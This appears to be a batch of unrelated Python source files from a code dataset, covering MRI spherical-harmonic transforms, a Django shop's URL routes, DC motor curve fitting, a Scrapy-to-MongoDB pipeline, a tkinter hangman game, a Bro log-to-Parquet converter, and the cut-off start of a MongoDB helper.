+{"seq_id":"315813950","text":"from scipy import special as sci\nimport numpy as np\nimport torch.nn as nn\nimport torch\nfrom dipy.reconst import dti\nfrom dipy.data import gradient_table\nfrom dipy.io.image import save_nifti\n\n\nclass Signal2SH(nn.Module):\n \"\"\"\n Signal2SH(dwi) -> dwi_sh\n\n Computes the corresponding spherical harmonic coefficients\n\n Args:\n x_in (5D tensor): input dwi tensor\n x_in.size(): (Batchsize x Number of shells * Number of gradients x DimX x DimY x DimZ)\n y (5D tensor): corresponding harmonic coefficients tensor\n y.size(): (Batchsize x Number of shells*Number of coefficients x DimX x DimY x DimZ)\n \"\"\"\n\n def __init__(self, sh_order, gradients, lb_lambda=0.006):\n super(Signal2SH, self).__init__()\n self.sh_order = sh_order\n self.lb_lambda = lb_lambda\n self.num_gradients = gradients.shape[0]\n self.num_coefficients = int((self.sh_order + 1) * (self.sh_order / 2 + 1))\n\n b = np.zeros((self.num_gradients, self.num_coefficients))\n l = np.zeros((self.num_coefficients, self.num_coefficients))\n for id_gradient in range(self.num_gradients):\n id_column = 0\n for id_order in range(0, self.sh_order + 1, 2):\n for id_degree in range(-id_order, id_order + 1):\n gradients_phi, gradients_theta, gradients_z = cart2sph(gradients[id_gradient, 0],\n gradients[id_gradient, 1],\n gradients[id_gradient, 2])\n y = sci.sph_harm(np.abs(id_degree), id_order, gradients_phi, gradients_theta)\n\n if id_degree < 0:\n b[id_gradient, id_column] = np.real(y) * np.sqrt(2)\n elif id_degree == 0:\n b[id_gradient, id_column] = np.real(y)\n elif id_degree > 0:\n b[id_gradient, id_column] = np.imag(y) * np.sqrt(2)\n\n l[id_column, id_column] = self.lb_lambda * id_order ** 2 * (id_order + 1) ** 2\n id_column += 1\n\n b_inv = np.linalg.pinv(np.matmul(b.transpose(), b) + l)\n self.Signal2SHMat = torch.from_numpy(np.matmul(b_inv, b.transpose()).transpose()).float()\n if torch.cuda.is_available():\n self.Signal2SHMat = self.Signal2SHMat.cuda()\n\n def forward(self, x_in):\n x = x_in.view(-1, np.ceil(x_in.size(1) / self.num_gradients).astype(int), self.num_gradients, x_in.size(2),\n x_in.size(3), x_in.size(4))\n x = x.permute(0, 1, 3, 4, 5, 2)\n y = x.matmul(self.Signal2SHMat)\n y = y.permute(0, 1, 5, 2, 3, 4).contiguous().view(x.size(0), -1, x_in.size(2), x_in.size(3), x_in.size(4))\n return y\n\n\nclass SH2Signal(nn.Module):\n \"\"\"\n SH2Signal(dwi_sh) -> dwi\n\n Computes the corresponding dwi signal for each gradient\n\n Args:\n x_in (5D tensor): input spherical harmonic tensor\n x_in.size(): (Batchsize x Number of shells*Number of coefficients x DimX x DimY x DimZ)\n y (5D tensor): corresponding dwi tensor\n y.size(): (Batchsize x Number of shells * Number of gradients x DimX x DimY x DimZ)\n \"\"\"\n\n def __init__(self, sh_order, gradients):\n super(SH2Signal, self).__init__()\n self.sh_order = sh_order\n self.num_gradients = gradients.shape[0]\n self.num_coefficients = int((self.sh_order + 1) * (self.sh_order / 2 + 1))\n\n SH2SignalMat = np.zeros((self.num_coefficients, self.num_gradients))\n for id_gradient in range(self.num_gradients):\n id_coefficient = 0\n for id_order in range(0, self.sh_order + 1, 2): # even order only\n for id_degree in range(-id_order, id_order + 1):\n gradients_phi, gradients_theta, gradients_z = cart2sph(gradients[id_gradient, 0],\n gradients[id_gradient, 1],\n gradients[id_gradient, 2])\n y = sci.sph_harm(np.abs(id_degree), id_order, gradients_phi, gradients_theta)\n if id_degree < 0:\n SH2SignalMat[id_coefficient, id_gradient] = np.real(y) * np.sqrt(2)\n elif id_degree == 0:\n SH2SignalMat[id_coefficient, id_gradient] = np.real(y)\n elif id_degree > 0:\n SH2SignalMat[id_coefficient, id_gradient] = np.imag(y) * np.sqrt(2)\n\n id_coefficient += 1\n\n self.SH2SignalMat = torch.from_numpy(SH2SignalMat).float()\n if torch.cuda.is_available():\n self.SH2SignalMat = self.SH2SignalMat.cuda()\n\n def forward(self, x_in):\n x_dim = x_in.size()\n x = x_in.view(-1, np.ceil(x_in.size(1) / self.num_coefficients).astype(int), self.num_coefficients,\n x_in.size(-3), x_in.size(-2), x_in.size(-1))\n x = x.permute(0, 1, 3, 4, 5, 2)\n y = x.matmul(self.SH2SignalMat)\n y = y.permute(0, 1, 5, 2, 3, 4).contiguous().view(x_dim[0], -1, x_dim[-3], x_dim[-2], x_dim[-1])\n return y\n\n\n# helper functions\ndef cart2sph(x, y, z):\n \"\"\"\n cart2sph(x, y, z) -> theta, phi, r\n\n Computes the corresponding spherical coordinate of the given input parameters :attr:`x`, :attr:`y` and :attr:`x`.\n\n Args:\n x (Number): x position\n y (Number): y position\n z (Number): z position\n\n Example::\n\n >>> cart2sph(1, 1, 1)\n (0.78539816339744828, 0.95531661812450919, 1.7320508075688772)\n\n \"\"\"\n azimuthal_angle = np.arctan2(y, x)\n radial_distance = np.sqrt(x**2 + y**2 + z**2)\n polar_angle = np.arccos(z/radial_distance)\n return azimuthal_angle, polar_angle, radial_distance\n\n\ndef sph2cart(azimuthal_angle, polar_angle, radial_distance):\n \"\"\"\n sph2cart(polar_angle, azimuthal_angle, radial_distance) -> x, y, z\n\n Computes the corresponding cartesian coordinate of the given input parameters :attr:`polar_angle`,\n :attr:`azimuthal_angle` and :attr:`radial_distance`.\n\n Args:\n polar_angle (Number): polar_angle\n azimuthal_angle (Number): azimuthal_angle\n radial_distance (Number): radial_distance\n\n Example::\n\n >>> cart2sph(0.78539816339744828, 0.95531661812450919, 1.7320508075688772)\n (0.99999999999999978, 0.99999999999999967, 1.0)\n\n \"\"\"\n x = radial_distance * np.sin(polar_angle) * np.cos(azimuthal_angle)\n y = radial_distance * np.sin(polar_angle) * np.sin(azimuthal_angle)\n z = radial_distance * np.cos(polar_angle)\n return x, y, z\n\n\ndef fit_dti(dwi, bvecs, bvalue):\n bvecs = bvecs / np.sqrt(np.sum(bvecs**2, axis=1, keepdims=True))\n bvecs = np.concatenate((np.ones((1, 3))/np.sqrt(3), bvecs))\n bvals = np.zeros((bvecs.shape[0]))\n bvals[1:] = bvalue\n gtab = gradient_table(bvals=bvals, bvecs=bvecs)\n tenmodel = dti.TensorModel(gtab)\n tenfit = tenmodel.fit(dwi)\n\n eigenvectors = tenfit.evecs\n eigenvalues = np.ones(eigenvectors.shape) * np.eye(3)\n eigenvalues *= np.expand_dims(tenfit.evals, -1)\n\n dti_tensor = np.matmul(np.matmul(eigenvectors, eigenvalues), eigenvectors.transpose(0, 1, 2, 4, 3))\n return dti_tensor\n\n\ndef save_fiber(file_name, streamlines, ref_shape, ref_affine):\n fiber_file = np.zeros(ref_shape)\n for id_streamline, current_streamline in enumerate(streamlines):\n for id_pos, current_pos in enumerate(current_streamline):\n current_pos = np.array(current_pos).astype(int)\n try:\n fiber_file[current_pos[0], current_pos[1], current_pos[2]] = 1\n except:\n print('Oh oh...')\n\n save_nifti(fname=file_name, data=fiber_file, affine=ref_affine)\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"7083287","text":"from django.conf.urls import include, url\nfrom . import views\t\t#импорт всех представлений из приложения shop\nimport paypal.standard.ipn.urls\nimport django.contrib.auth.views as auth_views\n\n\nurlpatterns = [\n\turl(r'^$', views.main_page, name='main_page'),\n\turl(r'^delivery/$', views.delivery, name='delivery'),\n\turl(r'^contacts/$', views.contacts, name='contacts'),\n\turl(r'^cart/$', views.cart, name='cart'),\n\turl(r'^cart/delete(?P[0-9]+)/$', views.del_product, name='del_product'),\n\turl(r'^catalog/cookies/$', views.cookies, name='cookies'),\n\turl(r'^catalog/cupcakes/$', views.cupcakes, name='cupcakes'),\n\turl(r'^catalog/cakes/$', views.cakes, name='cakes'),\n\turl(r'^product/(?P[0-9]+)/$', views.product, name='product'),\n\t# auth\n\turl(r'^accounts/login/$', views.account_login, name='login'),\n\turl(r'^accounts/signup/$', views.account_signup, name='signup'),\n\turl(r'^accounts/logout/$', views.account_logout, name='logout'),\n \turl(r'^accounts/profile/$', views.account_profile, name='profile'),\n # pay\n url(r'^payment/pay/$', views.payment_pay, name='pay'),\n url(r'^payment/success/$', views.payment_success, name='success'),\n url(r'^paypal/', include(paypal.standard.ipn.urls)),\n]\n","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"62661189","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ncharacter_list = {\n '电压': 'U',\n '电流': 'I',\n '电阻': 'R',\n '转数': 'N',\n '力矩常数': 'Kt',\n '粘性摩擦系数': 'bm',\n '反电势常数': 'Ke',\n '负载力矩': 'Ml',\n '静摩擦力矩': 'Mf',\n}\n#打印参数表\nfor x in character_list:\n print('%r:%r'%(x,character_list[x]))\n\n\n#standard unit\nVOL = 1 #Volt\nMNM = 0.001 #Torque\nRPM = 2*np.pi/60 #Speed\n\n\n# define the function of calculating the values of the DC_motor's character parameters\ndef fit_characters(matrix, rtol = 0.00001):\n '''\n ******input arguments*******\n matrix : n × [voltage, torque, velocity , current]\n n >= 2\n Units:\n voltage: V\n torque: N.m\n velocity: rad/s\n current: A\n \n ******return values*******\n (resistance, back_emf_const, torque_const, friction, damping)\n Units:\n resistance: Ohm\n back_emf_const: V / (rad/s)\n torque_const: N.m / A\n friction: N.m\n damping: N.m / (rad/s)\n bm_max: N.m / (rad/s)\n Mf_max: N.m\n \n '''\n matrix = np.array(matrix) # change the form of matrix \n # get the values of voltage,current,velocity and torque\n vol = matrix[:, 0] \n tor = matrix[:, 1]\n vel = matrix[:, 2]\n cur = matrix[:, 3]\n \n # calculate the values of resistance and Ke\n A = np.column_stack((vel, cur))\n Ke, R = np.linalg.lstsq(A, vol)[0]\n\n # calculate the values of Kt,bm,Mf and define the range of bm and Mf \n vol_mean = np.mean(vol)\n\n if np.allclose(vol, vol_mean, rtol, 0):\n\n A = np.column_stack((cur, -vel))\n K_t_1, bm_max = np.linalg.lstsq(A, tor)[0]\n\n A = np.column_stack((cur, -np.ones(vel.shape[0])))\n K_t_2, Mf_max = np.linalg.lstsq(A, tor)[0]\n\n Kt = (K_t_1 + K_t_2) / 2.0\n Mf = Mf_max / 2.0\n bm = bm_max / 2.0\n\n else:\n A = np.column_stack((cur, -vel, -np.ones(vel.shape[0])))\n K_t, b_m, f = np.linalg.lstsq(A, tor)[0]\n\n return R, Ke, Kt, Mf, bm, bm_max, Mf_max\n \n\n# define the function of getting the values of DC_motor character parameters\ndef get_characters(num_points, voltage, resistance, back_emf_const, torque_const, friction, damping):\n '''\n to get DC motor main characteristics by main parameter, voltage, resistance, back_emf_const,\n torque_const, friction, damping\n ******input arguments*******\n\n num_points >= 2\n Units:\n voltage: V\n resistance: Ohm\n back_emf_const: V / (rad/s)\n torque_const: N.m / A\n friction: N.m\n damping: N.m / (rad/s)\n\n ******return values*******\n return a matrix : num_points × [voltage, torque, velocity, current]\n Units:\n voltage: V\n torque: N.m\n velocity: rad/s\n current: A\n \n if num_points < 2, num_points = 2\n the first row of return matrix is no load condition\n the last row of return matrix is stall condition\n '''\n num_points = int(num_points)\n if num_points <= 2:\n num_points = 2\n \n R = resistance\n K_e = back_emf_const\n K_t = torque_const\n f = friction\n b_m = damping\n\n c = K_t * voltage / R\n b = b_m + K_t * K_e / R\n stall_tor = c - f\n no_load_vel = (c - f) / b\n\n no_load_cur = (f*K_e + voltage*b_m) / (R*b)\n vol = np.ones(num_points) * voltage\n vel = np.linspace(no_load_vel, 0, num_points)\n tor = np.linspace(0, stall_tor, num_points)\n cur = tor * K_e / (b*R) + no_load_cur\n\n return np.column_stack((vol, tor, vel, cur)).tolist()\n\n\n\nmatrix = [[12, 0*MNM, 9760.0*RPM, 0.32], [12, 160*MNM, 0*RPM, 15.43]]\n\n# calculate the characters of DC_motor\nresistance, back_emf_const, torque_const, friction, damping, bm_max, Mf_max = fit_characters(matrix)\nprint('R=%r\\tKe=%r\\nKt=%r\\tMf=%r\\tbm=%r\\nbm<=%r\\nMf<=%r\\n'%(resistance, back_emf_const, torque_const, friction, damping, bm_max, Mf_max))\n\n\n# plot main characteristic\n\nV = 12\nfit_matrix = get_characters(100, V, resistance, back_emf_const, torque_const, friction, damping)\nfit_matrix = np.array(fit_matrix)\npower = fit_matrix[:,1] * fit_matrix[:,2]\nefficiency = power / (fit_matrix[:,0] * fit_matrix[:,3]) * 100.0\ntor = fit_matrix[:,1] / MNM\nvel = fit_matrix[:,2] / RPM\ncur = fit_matrix[:,3] / 1\n\nfig, ax_velocity = plt.subplots(figsize = (8, 5.6), dpi=100)\nfig.subplots_adjust(left =0.12, right=0.74, top=0.92)\n\np1, = ax_velocity.plot(tor, vel, color='red', label='Velocity')\nax_velocity.set_xlabel('Torque (mN.m)', fontsize=12)\nax_velocity.set_ylabel('Velocity (rpm)', fontsize=12)\nax_velocity.set_xlim(0, 240)\n\nplt.xticks(np.linspace(0, 240, 13))\nplt.yticks(np.linspace(0, 16000, 9), ['0', '','4000', '','8000', '', '12000', '', '16000'])\nax_velocity.grid()\nax_velocity.set_title('SQ2953 {} V main characteristic fitting'.format(V), fontsize=16)\n \nax_velocity.text(0.25, 0.25, 'Resistant:',\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10)\nax_velocity.text(0.50, 0.25, '{:.3g} Ohm'.format(resistance),\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10, color='g') \nax_velocity.text(0.25, 0.20, 'back_emf_const:',\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10)\nax_velocity.text(0.50, 0.20, '{:.3g} V/(rad/s)'.format(back_emf_const),\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10, color='g') \nax_velocity.text(0.25, 0.15, 'Torque_const: ',\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10)\nax_velocity.text(0.50, 0.15, '{:.3g} Nm/A'.format(torque_const),\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10, color='g') \nax_velocity.text(0.25, 0.10, 'Friction: ',\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10)\nax_velocity.text(0.50, 0.10, '{:.3g} N.m'.format(friction),\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10, color='g') \nax_velocity.text(0.25, 0.05, 'Damping: ',\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10)\nax_velocity.text(0.50, 0.05, '{:.3g} N.m/(rad/s)'.format(damping),\n ha='left', va='top', transform=plt.gca().transAxes, fontsize=10, color='g') \n \nax_efficiency = ax_velocity.twinx()\np2, = ax_efficiency.plot(tor, efficiency, 'b-', label='Efficiency')\nax_efficiency.set_ylabel('Efficiency (%)', fontsize=12)\nax_efficiency.set_ylim(0, 80)\n\nax_current = ax_velocity.twinx()\np3, = ax_current.plot(tor, cur, 'g-', label='Current')\nax_current.set_ylabel('Current (mA)', fontsize=12)\nax_current.set_ylim(0, 24)\nplt.yticks(np.linspace(0, 24, 9), ['0', '', '6', '', '12', '', '18', '', '24'])\nax_current.spines['right'].set_position(('axes', 1.11))\n\nax_power = ax_velocity.twinx()\np4, = ax_power.plot(tor, power, 'm-', label='Power')\nax_power.set_ylabel('Power (W)', fontsize=12)\nax_power.set_ylim(0, 80)\nax_power.spines['right'].set_position(('axes', 1.26))\n\nlines = [p1, p2, p3, p4]\nlabels = [l.get_label() for l in lines]\nax_velocity.legend(lines, labels, loc='upper right', fontsize=12)\n\nfig.show()\nplt.close(fig)\n\n\n\n\n\n\n\n\n\n","sub_path":"calculate.py","file_name":"calculate.py","file_ext":"py","file_size_in_byte":7496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"421346211","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom scrapy.exceptions import DropItem\nfrom scrapy.conf import settings\nimport logging\nfrom pymongo import MongoClient\nfrom datetime import datetime\n\nclass TestPipeline(object):\n\n def __init__(self, mongo_uri, mongo_db):\n \tself.mongo_uri = mongo_uri\n \tself.mongo_db = mongo_db\n# uri is mongodb path\n @classmethod\n def from_crawler(cls, crawler):\n \treturn cls(\n \t\tmongo_uri = crawler.settings.get('MONGODB_URI'),\n \t\tmongo_db = crawler.settings.get('MONGODB_DB')\n \t)\n\n def open_spider(self, spider):\n \tself.client = MongoClient(self.mongo_uri)\n \tself.db = self.client[self.mongo_db]\n\n def close_spider(self, spider):\n \tself.client.close()\n\n def process_item(self, item, spider):\n valid = True\n for data in item:\n if not data:\n valid = False\n logging.log(logging.ERROR, \"Something Wrong!!\")\n raise DropItem(\"Missing {0}!\".format(data))\n item['Date'] = datetime.strptime(item['Date'][0], '%d/%m/%Y')\n if valid:\n # Cast captured data to Int.\n for i in item['AnData'].keys():\n if i != 'title':\n for index, num in enumerate(item['AnData'][i]):\n item['AnData'][i][index] = int(num)\n for i in item['EiData'].keys():\n if i != 'title':\n for index, num in enumerate(item['EiData'][i]):\n item['EiData'][i][index] = int(num)\n #operation to related DB\n self.db[settings['MONGODB_COLLECTION']].insert(dict(item))\n logging.log(logging.INFO, \"Daily Data in Viet added to MongoDB database!\")\n return item\n\n\n\n\n\n\n","sub_path":"Test/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"124514839","text":"import tkinter\nimport time\nimport random\nimport tkinter.font as tkFont\n\n# 建立視窗\nwin = tkinter.Tk()\nwin.title(\"Help Me!\")\nwin.geometry(\"600x300\")\nwin.configure(bg='#F0F8FF')\n\n# define finish button\ndef finish_adding():\n wordlabel.grid_forget()\n wordbox.grid_forget()\n btn.grid_forget()\n listlabel.grid_forget()\n hide_btn.grid_forget()\n check_btn.grid_forget()\n finish_btn.grid_forget()\n clear_btn.grid_forget()\n addlabel.grid_forget()\n new_word_btn.place(x=125,y=60)\n play_btn.place(x=125,y=100)\n \n# define add button的功能 \ndef addMes():\n # 判斷輸入值是否為空白、長度為0或已存在清單中,若是則不加入清單\n if len(str1.get()) != 0 and \" \" not in str1.get() and str1.get().lower() not in list1 and str1.get().encode( 'UTF-8' ).isalpha(): \n list1.append(str1.get().lower())\n str3.set(str1.get().lower()+\" is sucessfully added \")\n addlabel.grid(row=1,column=1)\n str2.set(list1)\n wordbox.delete(0, 'end')\n else:\n str3.set(\"Please enter another word!\")\n addlabel.grid(row=1,column=1)\n wordbox.delete(0, 'end')\n \n# define隱藏清單button的功能\ndef hide_list():\n listlabel.grid_forget()\n hide_btn.grid_forget()\n check_btn.grid(row=3,column=1)\n \n# define查看清單button的功能\ndef check_list():\n listlabel.grid(row=2,column=1)\n check_btn.grid_forget()\n hide_btn.grid(row=3,column=1)\n\n# define添加題目單字button的功能 \ndef enter_new_word():\n idiotlabel.grid_forget()\n wordlabel.grid(row=0, column=0)\n wordbox.grid(row=0,column=1)\n btn.grid(row=0,column=2)\n new_word_btn.place_forget()\n check_btn.grid(row=3,column=1)\n finish_btn.grid(row=0, column=3)\n clear_btn.grid(row=3, column=2)\n play_btn.place_forget()\n \n# define清除清單中\"最新加入元素\"的button的功能\ndef clear():\n if len(list1) != 0:\n list1.pop()\n str2.set(list1)\n listlabel.grid(row=2,column=1)\n \n# define開始遊戲button的功能 (包含整個遊戲流程) \ndef start_game():\n \n if len(str2.get()) == 0:\n idiotlabel.grid(row=1,column=1)\n return\n \n else:\n \n #define 輸入答案的函數\n def enter():\n \n input_ = input_answer.get().lower()\n input_answer.delete(0, 'end')\n \n if times.get() > 0:\n\n if not input_.encode( 'UTF-8' ).isalpha():\n result1.set(\"Please enter another word! Remain \"+str(times.get())+\" times\")\n return\n \n if input_ == ans.get():\n result2.set(\"You win!The correct answer is \"+\"\".join(ans.get()))\n cv.create_oval(220,50,320,150,fill='cornsilk')\n cv.create_line(260,100,260,110)\n cv.create_line(280,100,280,110)\n cv.create_arc(260, 110, 280,130, start=180, extent=180,fill='orangered')\n times.set(-1)\n return\n \n correct_word = 0\n\n for i in range(0,len(ans.get())):\n if ans.get()[i] == input_:\n temp[i] = input_\n correct_word += 1\n \n if \"-\" not in temp:\n result2.set(\"You win!The correct answer is \"+\"\".join(ans.get()))\n cv.create_oval(220,50,320,150,fill='cornsilk')\n cv.create_line(260,100,260,110)\n cv.create_line(280,100,280,110)\n cv.create_arc(260, 110, 280,130, start=180, extent=180,fill='orangered')\n times.set(-1)\n return\n \n if correct_word == 0:\n times.set(times.get()-1)\n \n result1.set(\"Remain \"+str(times.get())+\" times. The answer now is \"+\"\".join(temp))\n result2.set(\"\".join(temp))\n draw(times.get())\n \n if times.get() == 0:\n draw(times.get())\n result2.set(\"IDIOT!The answer is \"+\"\".join(ans.get()))\n times.set(-1)\n\n #define 繪圖的函數 \n def draw(times:int):\n if times == 9:\n cv.create_oval(220,50,320,150,fill='white')\n elif times == 8: \n cv.create_line(270,150,270,250)\n elif times == 7:\n cv.create_line(220,190,270,160)\n elif times == 6:\n cv.create_line(270,160,320,180)\n\n elif times == 5:\n cv.create_line(250,300,270,250)\n elif times == 4:\n cv.create_line(290,300,270,250)\n elif times == 3:\n #alive\n cv.create_line(260,100,260,110)\n elif times == 2:\n cv.create_line(280,100,280,110)\n elif times == 1:\n cv.create_arc(260,120,280,120, start=0, extent=180)\n elif times == 0:\n #die\n cv.create_line(260,100,250,110)\n cv.create_line(250,100,260,110)\n cv.create_line(280,100,290,110)\n cv.create_line(290,100,280,110)\n cv.create_oval(240,20,300,40,fill='yellow')\n cv.create_oval(245,25,295,35,fill='white')\n else:\n return\n \n #define 重新開始的函數\n def restart():\n secwin.destroy()\n start_game()\n\n #設定次數\n times = tkinter.IntVar()\n times.set(10)\n #設定結果的變數\n result1 = tkinter.StringVar()\n result2 = tkinter.StringVar()\n #選擇題目\n ans = tkinter.StringVar()\n ans.set(random.choice(list1))\n #設定顯示的_\n temp = list(\"-\"*len(ans.get()))\n \n secwin=tkinter.Toplevel(win) #建立新的子視窗,可以有多個子視窗\n secwin.geometry(\"500x500\")\n secwin.title(\"Start game\") #子視窗的標題\n secwin.configure(bg = \"lavender\")\n lab1=tkinter.Label(secwin, text=\"The vocabulary you want to guess has \"+str(len(ans.get()))+\" alphabets\",bg = \"lavender\")\n input_answer = tkinter.Entry(secwin, width=20) #建立一個Entry元件\n btn=tkinter.Button(secwin, text=\"Confirm\", command=enter) #建立一個Button的元件\n result_1 = tkinter.Label(secwin,textvariable = result1,bg = \"lavender\")\n result_2 = tkinter.Label(secwin,textvariable = result2,bg = \"lavender\",font = ft)\n cv = tkinter.Canvas(secwin,bg = \"lavender\",height='500',width='500')\n cv.create_line(270,50,270,10)\n cv.create_line(180,10,270,10)\n cv.create_line(180,10,180,350)\n cv.create_line(180,350,270,350)\n \n restart_btn = tkinter.Button(secwin,text = \"Restart\",command = restart)\n \n\n lab1.pack()\n input_answer.pack()\n btn.pack()\n result_1.pack()\n result_2.pack()\n restart_btn.pack()\n cv.pack()\n\n# define 字串物件\nstr3=tkinter.StringVar()\nstr2=tkinter.StringVar()\nstr1=tkinter.StringVar()\n\n# define 基礎元件\nft = tkFont.Font(size=16)\naddlabel=tkinter.Label(win,textvariable=str3,bg='#F0F8FF',font = ft)\nbtn = tkinter.Button(win,text='Add',command=addMes,font = ft)\nwordbox= tkinter.Entry(win,textvariable=str1,font = ft)\nwordlabel= tkinter.Label(win, text=\"Enter the word\",bg='#F0F8FF',font = ft)\nidiotlabel= tkinter.Label(win, text=\"IDIOT!Enter the word!\",bg='#F0F8FF',font = ft)\nhide_btn=tkinter.Button(win, text=\"Hide the words\",command=hide_list,font = ft)\ncheck_btn=tkinter.Button(win, text=\"Show the words\",command=check_list,font = ft)\nnew_word_btn=tkinter.Button(win,text=\"Enter new word\",command=enter_new_word,font = ft)\nfinish_btn=tkinter.Button(win, text='Finish',command=finish_adding,font = ft)\nclear_btn=tkinter.Button(win, text='Clear',command=clear,font = ft)\nplay_btn=tkinter.Button(win,text=\"Start\",command=start_game,font = ft)\nlistlabel=tkinter.Label(win,wraplength=200, justify='left',textvariable=str2,bg='#F0F8FF',font = ft)\n\nnew_word_btn.place(x=125,y=60)\nplay_btn.place(x=125,y=100)\n\n# define 題目清單\nlist1=['internationalization','legistimate','configuration','elaborate','traumatically','significant']\nstr2.set(list1)\n\nwin.mainloop()\n","sub_path":"english-game-master/main3_new.py","file_name":"main3_new.py","file_ext":"py","file_size_in_byte":8393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"308324786","text":"# -*- coding: utf-8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\"\"\"\nCreated on Thu May 30 08:54:16 2018\n\nRecusively convert compressed bro logs into parquet with rsync style\n\npython mods_bat.py --h\n\n@author: giangnguyen\n\"\"\"\n\nimport gzip\nimport os\nimport numpy as np\nimport pandas as pd\nimport sklearn\nimport shutil\n# import matplotlib.pyplot as plt\nfrom os.path import expanduser\n# from pprint import pprint\n\nimport pyspark\nimport pyarrow\n# from pyspark.sql import SparkSession\n\nimport bat\n# from bat import bro_log_reader\n# from bat.log_to_dataframe import LogToDataFrame\nfrom bat.log_to_parquet import log_to_parquet\n\n\n# Data\ndir_userhome = expanduser(\"~\")\ndir_data = dir_userhome + '/data/deep-dm/'\ndir_logs = dir_data + 'logs/'\ndir_parquet = dir_data + 'logs_parquet/'\n\n\ndef print_libs_versions():\n print('BAT: {:s}'.format(bat.__version__))\n print('Numpy: {:s}'.format(np.__version__))\n print('Pandas: {:s}'.format(pd.__version__))\n print('PyArrow: {:s}'.format(pyarrow.__version__))\n print('PySpark: {:s}'.format(pyspark.__version__))\n print('Scikit Learn: ', sklearn.__version__)\n return\n\n\ndef bro_print_log():\n '''\n dir_day = '2018-05-15/'\n filename = 'conn.00:00:00-01:00:00.log'\n reader = bro_log_reader.BroLogReader(dir_logs + dir_day + filename)\n for row in reader.readrows():\n pprint(row)\n\n bro_df = LogToDataFrame(dir_logs + dir_day + filename)\n $print(bro_df.head())\n '''\n return\n\n\ndef gzip_to_parquet(dir_logs, dir_parquet):\n print(dir_logs, dir_parquet)\n fn_excluded = ['current', 'loaded_scripts']\n\n for root, directories, filenames in os.walk(dir_logs):\n for subdir in directories:\n subdir_parquet = os.path.join(root, subdir).replace(dir_logs, dir_parquet)\n if not os.path.exists(subdir_parquet):\n os.makedirs(subdir_parquet)\n print('mkdir ' + subdir_parquet)\n\n for fn in filenames:\n ffn = os.path.join(root, fn)\n fn_log = ffn.replace(dir_logs, dir_parquet).replace('.log.gz', '.log')\n fn_parquet = fn_log.replace('.log', '.parquet')\n print(ffn)\n\n if not os.path.isfile(fn_parquet) and not any(ss in fn for ss in fn_excluded):\n print('\\t ... decompressing to ' + fn_log)\n with gzip.open(ffn, 'rb') as fin:\n with open(fn_log, 'wb') as fout:\n shutil.copyfileobj(fin, fout)\n\n if 'summary' not in fn_log:\n log_to_parquet(fn_log, fn_parquet)\n os.remove(fn_log)\n print('\\t ... converted to ' + fn_parquet)\n return\n\n\ndef main(argv):\n # print_libs_versions()\n # bro_print_log()\n if argv.convert == 'yes':\n gzip_to_parquet(argv.dir_logs, argv.dir_parquet)\n return\n\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(description='mods_bat', epilog='---')\n parser.add_argument(\"--convert\", default='yes',\n dest=\"convert\", help=\"convert gzip to parquet\",\n metavar=\"yes/no\")\n parser.add_argument(\"--in\", default=dir_logs,\n dest=\"dir_logs\", help=\"logs directory\",\n metavar=\"path/to/dir/\")\n parser.add_argument(\"--out\", default=dir_parquet,\n dest=\"dir_parquet\", help=\"parquet directory\",\n metavar=\"path/to/dir/\")\n args = parser.parse_args()\n main(args)\n","sub_path":"mods_bat.py","file_name":"mods_bat.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"425531803","text":"# encoding=utf8\r\nfrom json import dumps\r\nfrom urllib.parse import quote\r\nfrom extra import *\r\nfrom random import randint\r\nfrom random import choice\r\nfrom random import shuffle\r\nfrom openpyxl import *\r\n\r\nimport logging\r\nimport os\r\nimport pickle\r\nimport requests\r\nimport time\r\nimport sys\r\nimport pymongo\r\n\r\n\r\n\"\"\"全局配置\"\"\"\r\n\r\n\r\ndef default_mongoconf(ip=\"192.168.2.117\", port=27017, db=\"work_object\", key=None, col_key=\"id\", usr=\"\", pwd=\"\", authdb=\"\"):\r\n key = f\"work{time.time()*(10**6)}_{randint(1000,10000)}\" if not key else key\r\n return {\r\n \"link\": [ip, port],\r\n \"auth\": (usr, pwd),\r\n \"authdb\": authdb,\r\n \"db\": db,\r\n \"col\": key,\r\n \"col_key\": col_key\r\n }\r\n\r\n\r\nclass MONGODB(object):\r\n \"\"\"mongo连接类\"\"\"\r\n\r\n def __init__(self, karg):\r\n super(MONGODB, self).__init__()\r\n self.conf = karg\r\n self.logger = logging.getLogger(type(self).__name__)\r\n self.db = self.conf[\"db\"]\r\n self.col = 